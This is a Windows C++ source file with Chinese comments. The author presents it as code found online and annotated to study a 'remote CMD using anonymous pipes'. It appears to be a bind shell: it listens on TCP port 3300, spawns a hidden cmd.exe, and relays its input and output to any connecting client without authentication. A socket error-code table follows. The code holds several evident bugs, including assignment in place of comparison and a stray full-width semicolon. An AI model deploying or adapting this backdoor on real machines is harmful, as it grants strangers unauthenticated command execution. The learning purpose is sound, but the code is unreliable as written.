// vctelnetserver.cpp : Defines the entry point for the console application.
//这是从网上找的代码，相当于从解读代码的角度来分析这个“利用匿名管道实现的远程CMD”来学习我们这周的内容咯
//也算是半个晚上的成果，牛掰大神们不要笑话某渣
//by 司空徵

#include "stdio.h"
#include <Winsock2.h>
#include <Windows.h>
#include <Winbase.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
 
void main()
{
 WSADATA zi;//该结构被用来储存调用AfxSocketInit全局函数返回的Windows Sockets初始化信息。
 SOCKET telnetan;//TCP协议什么的telnet命令有关？！╮(╯_╰)╭
 int pcport = 3300;
 int ret;
 if ((ret = WSAStartup(MAKEWORD(2,2),&zi)) != 0)//初始化差错报错系列
 
//windows初始化socket网络库申请2.2版本,从而使得高版本的Winsock可以使用
//winsock基础 如下
//http://wenku.baidu.com/link?url=Rvhc48n-iTPvXyndf2V-AyHd6pK39_H4ZQf8qlOd1Fkrb4NOmKC0Irf7uM6lXMDLM6iHsiP68-AVJiIrWHYNL4i5O3zDNNqdqKNfpo8hpbi

 {
  printf("WSAStartup failed with error %d\n", ret);
  return;
 }
 if ((telnetan = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)//如果socket被设置成无效套接字
 { 
  printf("socket failed with error %d\n", WSAGetLastError());//从而使得高版本的Winsock可以使用
  WSACleanup();
  return;
 }
 
 SOCKADDR_IN telnet_server;
 //sockaddr_in和sockaddr是并列的结构，指向sockaddr_in的结构体的指针也可以指向
//sockaddr的结构体，并代替它。也就是说，你可以使用sockaddr_in建立你所需要的信息,
 
 
 telnet_server.sin_family = AF_INET;//Address family 一般来说 AF_INET（地址族）PF_INET（协议族 ）
 telnet_server.sin_port = htons(pcport);//Port number (必须要采用网络数据格式,普通数字可以用htons()函数转换成网络数据格式的数字) 
 telnet_server.sin_addr.s_addr = htonl(INADDR_ANY);// Internet address
    if (bind(telnetan, (SOCKADDR *)&telnet_server, sizeof(telnet_server))== SOCKET_ERROR)
            //bind()——将本端sockaddr_in（赋值后）强制转换成sockaddr 类型，绑定到socket 句柄上
 {
  printf("bind failed with error %d\n", WSAGetLastError());
  closesocket(telnetan);
  WSACleanup();
  return;
 }
 if (listen(telnetan, 5) == SOCKET_ERROR)//末尾处有socket error一览表。。。原谅我的储物癖~\(≧▽≦)/~
 {
  printf("listen failed with error %d\n", WSAGetLastError());
  closesocket(telnetan);
  WSACleanup();
  return;
 }
 int telnetsize=sizeof(telnet_server);
 SOCKET clientaccept； 
 while (true)
 {
         if((clientaccept = accept(telnetan, (SOCKADDR *) &telnet_server,&telnetsize)) != INVALID_SOCKET)
  {
     //建立匿名管道
     SECURITY_ATTRIBUTES pipeline1,pipeline2;
     HANDLE hReadPipe,hWritePipe,hWriteFile,hReadFile;
 
     pipeline1.nLength = sizeof(SECURITY_ATTRIBUTES);
     pipeline1.lpSecurityDescriptor = NULL;
     pipeline1.bInheritHandle = true;
 
     if((ret = CreatePipe(&hReadPipe,&hWriteFile,&pipeline1,0)) = 0)        
     {
      printf("建立cmd管道失败! ::d%",GetLastError());
      WSACleanup();
     }
 
     pipeline2.nLength = sizeof(SECURITY_ATTRIBUTES);
     pipeline2.lpSecurityDescriptor = NULL;
     pipeline2.bInheritHandle = true;
 
     if((ret = CreatePipe(&hReadFile,&hWritePipe,&pipeline2,0)) = 0)         
     {
      printf("建立cmd管道失败! ::d%",GetLastError());
      WSACleanup();    
     }
     //进程结构体 CMD来啦~(～o￣▽￣)～o ~。。。 
     STARTUPINFO cmdpos;
     ZeroMemory(&cmdpos,sizeof(cmdpos));//将结构体里的所有成员初始值置为0
 
     GetStartupInfo(&cmdpos);
     cmdpos.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
     cmdpos.wShowWindow = SW_HIDE;
     cmdpos.hStdInput = hReadPipe;
     cmdpos.hStdOutput = hWritePipe;
     cmdpos.hStdError = hWritePipe;
 
     PROCESS_INFORMATION processinformation;
 
     //正式建立进程
     char szAPP[256];
     char recv_buff[1024];
     char send_buff[1024];
     DWORD nByteToWrite, nByteWritten,len;//至此 分享一个06的人写的“编程实现远程Shell的获取”
                                                                                        //http://hi.baidu.com/olhack/item/76aa411487891e0b8fbde40e                                         
     GetSystemDirectory(szAPP,MAX_PATH+1);
     strcat(szAPP,"\\cmd.exe");
     ret=CreateProcess(NULL,szAPP,NULL,NULL,1,0,NULL,NULL,&cmdpos,&processinformation);
         //WIN32API函数CreateProcess用来创建一个新的进程和它的主线程，这个新进程运行指定的可执行文件
 
       while(true)
       {
          ReadFile(hReadFile,send_buff,1024,&len,NULL);
          send(clientaccept,send_buff,len,0);
          printf("%s",send_buff);
          Sleep(1);
          nByteToWrite = recv(clientaccept,recv_buff,1024,0);
          WriteFile(hWriteFile,recv_buff,nByteToWrite,&nByteWritten,NULL);
                                     Sleep(1);

     }
  }
 }
}
 
 
 
 /*************************************socket错误一览***********************************************
  
 
Socket error 0 - Directly send error 
Socket error 10004 - Interrupted function call 
 Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address 
 Socket error 10022 - Invalid argument 
Socket error 10024 - Too many open files 
Socket error 10035 - Resource temporarily unavailable 
Socket error 10036 - Operation now in progress 
Socket error 10037 - Operation already in progress 
Socket error 10038 - Socket operation on non-socket 
Socket error 10039 - Destination address required 
Socket error 10040 - Message too long 
Socket error 10041 - Protocol wrong type for socket 
Socket error 10042 - Bad protocol option 
Socket error 10043 - Protocol not supported 
Socket error 10044 - Socket type not supported 
Socket error 10045 - Operation not supported 
Socket error 10046 - Protocol family not supported 
Socket error 10047 - Address family not supported by protocol family 
Socket error 10048 - Address already in use 
Socket error 10049 - Cannot assign requested address 
Socket error 10050 - Network is down 
Socket error 10051 - Network is unreachable 
Socket error 10052 - Network dropped connection on reset 
Socket error 10053 - Software caused connection abort 
Socket error 10054 - Connection reset by peer 
Socket error 10055 - No buffer space available 
Socket error 10056 - Socket is already connected 
Socket error 10057 - Socket is not connected 
Socket error 10058 - Cannot send after socket shutdown  
Socket error 10060 - Connection timed out  
Socket error 10061 - Connection refused  
Socket error 10064 - Host is down  
Socket error 10065 - No route to host 
Socket error 10067 - Too many processes 
Socket error 10091 - Network subsystem is unavailable 
Socket error 10092 - WINSOCK.DLL version out of range 
Socket error 10093 - Successful WSAStartup not yet performed 
Socket error 10094 - Graceful shutdown in progress 
Socket error 11001 - Host not found 
Socket error 11002 - Non-authoritative host not found 
Socket error 11003 - This is a non-recoverable error  
Socket error 11004 - Valid name, no data record of requested type  
WSAEADDRINUSE (10048) Address already in use 
WSAECONNABORTED (10053) Software caused connection abort  
WSAECONNREFUSED (10061) Connection refused 
WSAECONNRESET (10054) Connection reset by peer  
WSAEDESTADDRREQ (10039) Destination address required  
WSAEHOSTUNREACH (10065) No route to host  
WSAEMFILE (10024) Too many open files 
WSAENETDOWN (10050) Network is down  
WSAENETRESET (10052) Network dropped connection  
WSAENOBUFS (10055) No buffer space available 
WSAENETUNREACH (10051) Network is unreachable  
WSAETIMEDOUT (10060) Connection timed out 
WSAHOST_NOT_FOUND (11001) Host not found 
WSASYSNOTREADY (10091) Network sub-system is unavailable 
WSANOTINITIALISED (10093) WSAStartup() not performed 
WSANO_DATA (11004) Valid name, no data of that type 
WSANO_RECOVERY (11003) Non-recoverable query error 
WSATRY_AGAIN (11002) Non-authoritative host found 
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version 
 
************************************socket错误一览***********************************************/